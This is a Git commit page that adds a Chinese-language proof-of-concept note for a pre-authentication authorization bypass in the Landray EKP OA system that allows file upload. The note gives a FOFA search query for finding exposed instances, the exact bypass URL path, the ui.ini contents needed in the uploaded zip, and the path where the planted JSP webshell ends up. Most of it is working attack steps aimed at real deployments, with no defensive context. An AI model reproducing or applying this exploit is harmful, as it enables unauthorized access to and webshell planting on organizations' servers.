admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 蓝凌EKP前台授权绕过导致文件上传.md

Browse Source
This commit is contained in:
wy876 2023-12-12 19:58:14 +08:00 committed by GitHub
parent 8ceccb96e4
commit eddef063cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
蓝凌EKP前台授权绕过导致文件上传.md Normal file
View File

@ -0,0 +1,30 @@
## 蓝凌EKP前台授权绕过导致文件上传
## fofa
```
app="Landray-OA系统"
```
访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。
## poc
```
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
```
![image](https://github.com/wy876/POC/assets/139549762/47bd374a-d072-46ab-824e-e23ef8d08a69)
## 文件上传
然后上传zip包需要有ui.ini文件内容如下
```
id=ZzzZname=testthumb=test
```
![image](https://github.com/wy876/POC/assets/139549762/1d6615f9-a98b-4747-a6a8-9e6bdd3218c0)
![image](https://github.com/wy876/POC/assets/139549762/1cb1a160-309f-44bb-b0d3-03e59b163258)
马会在/resource/ui-ext/ZzzZ/jmdyy.jsp